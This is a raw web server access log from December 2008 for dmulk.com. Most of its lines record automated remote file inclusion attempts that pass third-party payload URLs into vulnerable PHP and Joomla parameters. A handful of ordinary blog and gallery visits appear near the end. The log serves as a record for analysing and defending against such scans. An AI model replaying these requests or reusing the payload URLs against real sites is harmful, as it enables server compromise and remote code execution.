195.110.147.194 - - [08/Dec/2008:08:10:31 -0800] "GET /logs/access_080909.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ragas.baarleweb.net/data/sobi/2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:10:31 -0800] "GET /logs/access_080831.log/index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:10:31 -0800] "GET /logs/index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:10:31 -0800] "GET /logs/access_080503.log/index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.21.71.133 - - [08/Dec/2008:08:10:32 -0800] "GET /index.php?sourcedir=http://www.novoftp.xpg.com.br/id3.txt??? HTTP/1.1" 200 94711 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:10:32 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:10:32 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:10:32 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:10:33 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:10:33 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:10:33 -0800] "GET /logs/access_081012.log/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:10:34 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:37 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:37 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:37 -0800] "GET /logs//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:10:37 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:10:37 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:10:38 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.98.254 - - [08/Dec/2008:08:10:38 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:10:57 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:11:03 -0800] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:11:04 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:11:05 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:11:06 -0800] "GET /logs/access_080414.log/mcf.php?content=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.72.108 - - [08/Dec/2008:08:11:10 -0800] "GET /logs/access_080604.log HTTP/1.1" 200 2377497 "-" "Mozilla/5.0 Compatible" "www.dmulk.com"
122.153.41.5 - - [08/Dec/2008:08:11:23 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:08:11:27 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:11:39 -0800] "GET /logs/access_080714.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://danceofdreams.org//nw/phpbb2/phpBB2/admin/mods/Admin_Userlist_2/processed/log/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:11:53 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:11:53 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:08:11:58 -0800] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.245.44 - - [08/Dec/2008:08:11:58 -0800] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.110.147.194 - - [08/Dec/2008:08:12:10 -0800] "GET /logs/access_080909.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://ragas.baarleweb.net/data/sobi/2/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:12:11 -0800] "GET /logs/access.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://danceofdreams.org//nw/phpbb2/phpBB2/admin/mods/Admin_Userlist_2/processed/log/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:12:31 -0800] "GET /logs/access_081022.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:12:32 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:12:32 -0800] "GET /logs/access_081015.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:12:32 -0800] "GET /logs/access_081109.log//adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:12:37 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.11 - - [08/Dec/2008:08:12:37 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://photo.jcc.idv.tw/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:08:12:39 -0800] "GET /logs/access_081015.log/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:12:48 -0800] "GET /[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:12:51 -0800] "GET /logs/access_080223.log/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:12:51 -0800] "GET /errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:12:51 -0800] "GET /logs/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:12:52 -0800] "GET /logs/access_080727.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:12:55 -0800] "GET /logs/access_080828.log/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:12:59 -0800] "GET /logs/access_081008.log/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.242.116.64 - - [08/Dec/2008:08:13:07 -0800] "GET /logs/access_080525.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.116.64 - - [08/Dec/2008:08:13:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.116.64 - - [08/Dec/2008:08:13:08 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://ronniann.com//assets/galleries/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:08:13:12 -0800] "GET /logs/access_081008.log/index.php?_DOCUMENT_ROOT=http://www.ss-safety.co.kr/kboard/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:08:13:24 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:08:13:24 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:08:13:24 -0800] "GET /logs/access_081016.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:13:27 -0800] "GET /logs/access_080522.log/[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:13:28 -0800] "GET /[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:13:28 -0800] "GET /logs/[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /logs/access_080401.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:32 -0800] "GET /logs/access_080408.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:13:36 -0800] "GET /logs/access_080511.log/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.60.183 - - [08/Dec/2008:08:13:46 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.60.183 - - [08/Dec/2008:08:13:46 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.60.183 - - [08/Dec/2008:08:13:46 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.60.183 - - [08/Dec/2008:08:13:48 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:13:51 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:13:51 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:13:52 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:08:13:53 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:14:04 -0800] "GET /logs/access_080430.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:14:04 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:08:14:04 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.171.39 - - [08/Dec/2008:08:14:06 -0800] "GET /logs/access_081024.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.109.21 - - [08/Dec/2008:08:14:08 -0800] "GET /logs/access_080507.log/[Scripthttp://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.84.183.38 - - [08/Dec/2008:08:14:15 -0800] "GET /adminhead.php?path[docroot]=http://www.meetpark.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:19 -0800] "GET /logs/access_080525.log/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:19 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:19 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:27 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:37 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:14:37 -0800] "GET //vwar/backup/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:14:37 -0800] "GET /logs///vwar/backup/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:37 -0800] "GET /modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.35.84.90 - - [08/Dec/2008:08:14:37 -0800] "GET /logs/access_080919.log///vwar/backup/errors.php?error=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:14:38 -0800] "GET /logs/access_081022.log//adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:38 -0800] "GET /logs/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:14:38 -0800] "GET /adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:14:38 -0800] "GET /logs//adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
91.186.161.236 - - [08/Dec/2008:08:14:39 -0800] "GET /logs/access_081109.log//adminhead.php?path%5Bdocroot%5D=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:14:44 -0800] "GET /logs/access_081114.log%20/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:14:44 -0800] "GET /errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [08/Dec/2008:08:14:44 -0800] "GET /logs/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:49 -0800] "GET /funny/ HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:50 -0800] "GET /funny/?N=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:50 -0800] "GET /funny/?M=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:50 -0800] "GET /funny/?S=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:50 -0800] "GET /funny/?D=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
61.175.134.69 - - [08/Dec/2008:08:14:50 -0800] "GET /logs/access_080102.log/modifyform.html?code=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:51 -0800] "GET / HTTP/1.1" 200 94178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:52 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:52 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:52 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:52 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:52 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:53 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:56 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:56 -0800] "GET /logs/access_080404.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:57 -0800] "GET /funny/?N=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:57 -0800] "GET /funny/?M=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:57 -0800] "GET /funny/?D=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:57 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:57 -0800] "GET /bikes/occcb/eBayISAPI.dll.htm HTTP/1.1" 200 89191 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:57 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:08:14:57 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hipercci.org/y.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.254.44.210 - - [08/Dec/2008:08:14:58 -0800] "GET /logs/access_081114.log%20/errors.php?error=http://www.samilglass.com/images/v6id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:58 -0800] "GET /blog/index.php/2008/10/09/so-this-guy-walks-into-a-bank-10908/ HTTP/1.1" 200 9609 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:58 -0800] "GET /?show=gallery&pageid=175 HTTP/1.1" 200 166028 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:58 -0800] "GET /blog/index.php/2008/08/28/occ-american-hondas-part-1/ HTTP/1.1" 200 9741 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:58 -0800] "GET /blog/ HTTP/1.1" 200 94225 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
58.217.129.52 - - [08/Dec/2008:08:14:58 -0800] "GET /blog/index.php/2008/09/13/occ-american-hondas-part-2/ HTTP/1.1" 200 8465 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "dmulk.com"
